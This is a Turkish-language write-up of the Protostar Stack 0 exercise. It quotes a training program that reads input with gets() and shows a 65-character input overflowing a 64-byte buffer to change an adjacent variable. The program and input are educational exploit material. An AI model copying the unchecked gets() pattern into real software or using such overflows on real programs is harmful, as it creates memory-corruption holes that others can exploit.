Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | Protostar: Stack 0 Writeup

Stack0.c

Amaç: “you have changed the ‘modified’ variable” satırını yazdırmak.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
}

 

İstediğimiz cümleyi yazdırabilmemiz için programın akışını değiştirilebilmemiz gerekiyor. Bunun için bir yukarıdaki if koşulunun sağlanması gerekmekte, bunun içinde modified değişkeninin yukarıda tanımlanan 0 değerinden başka bir değere sahip olması gerekmekte.

Programın Çalıştırılması

[email protected]:/opt/protostar/bin$ ./stack0
Merhaba
Try again?

Programmı çalıştırdığım zaman gets() fonksiyonuyla kullanıcıdan stdin -standart input- değer aldığını daha sonra modified değişkeni hala 0 olduğu için “Try again?” mesajını yazdırdığını görüyoruz.

gets() Fonsiyonundaki Sorun

Burada gets() fonksiyonuna dikkat etmek gerekiyor. Eğer man sayfalarını kontrol edecek olursak.

Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security.

Yani gets() fonksiyonu stack frame’e istediğimiz gibi doldurabilmemize olanak sağlıyor. Burada stack frame ile kast edilen şey programdaki fonksiyonları lokal değişkenleri stack içerisinde atılır ve her fonksiyonun kendine ait bir stack frame’i bulunur. Böylece program içerisindeki fonksiyonlar birbirlerinin değişkenlerine erişemezler. -Global değişkenler bundan farklı olarak adresleri ile çağırılırlar ve bu değişkenler stack veya heap dışında Data Sectiontutulur.

Çalıştırılabilir Dosyanın Bölümleri

 • Code (Text)
 • Data
 • Stack
 • Heap

Code (Text): Basitçe makina kodlarının bulunduğu bölüm.
Data: Global ve statik değişken adreslerinin bulunduğu bölüm.
Stack: Lokal değişkenlerin bulunduğu bölüm. Belleğin sonundan Data kısmına doğru büyür. -Stack pointerin adresi küçülür-
Heap: Dinamik değişkenlerin bulunduğu bölüm. Data bölümünden belleğin alt kısımlarına doğru büyür.

Modified Değişkenini Değiştirilmesi

Yukarıdaki bilgiler doğrultusunda gets() fonksiyonunu kullanarak aynı stack frame’de bulunan modified değişkenini değiştirebiliriz. Bunu yapmak aslında çok kolay. Programa input verirken buffer[64]‘ı doldurduktan sonra yazmaya devam etmemiz yeterli.

İstediğim kadar harf üretebilmek için python’dan yardım alıyorum

[email protected]:/opt/protostar/bin$ python -c "print('A'*64)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

64 tane A verdiğimiz zaman ilk seferde çalıştırdığımdaki çıktıyı görüyorum bu zaten buffer dolduğu fakat modified değişkeni değişmediği için beklenilen sonuç.

[email protected]:/opt/protostar/bin$ ./stack0 #64 Tane A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Try again?

Buffer dolduktan hemen sonra modified (int) değişkeni(4 byte) olduğu için sadece tek bir byte’ını değiştirmem yetti.

[email protected]:/opt/protostar/bin$ ./stack0 #65 Tane A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have changed the 'modified' variable

Eğer buffer ve 4byte’lık modified değişkenini değiştirdikten sonra yazmaya devam edersek “Segmentation fault” denilen hata ile karşılaşırız. Segmentation Fault programın kendi hafıza alanının dışındaki bir adrese erişmeye çalıştığı zaman işletim sistemi tarafından döndürülen bir hatadır.

[email protected]:/opt/protostar/bin$ ./stack0 #100 Tane A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have changed the 'modified' variable
Segmentation fault

About Emir Kurt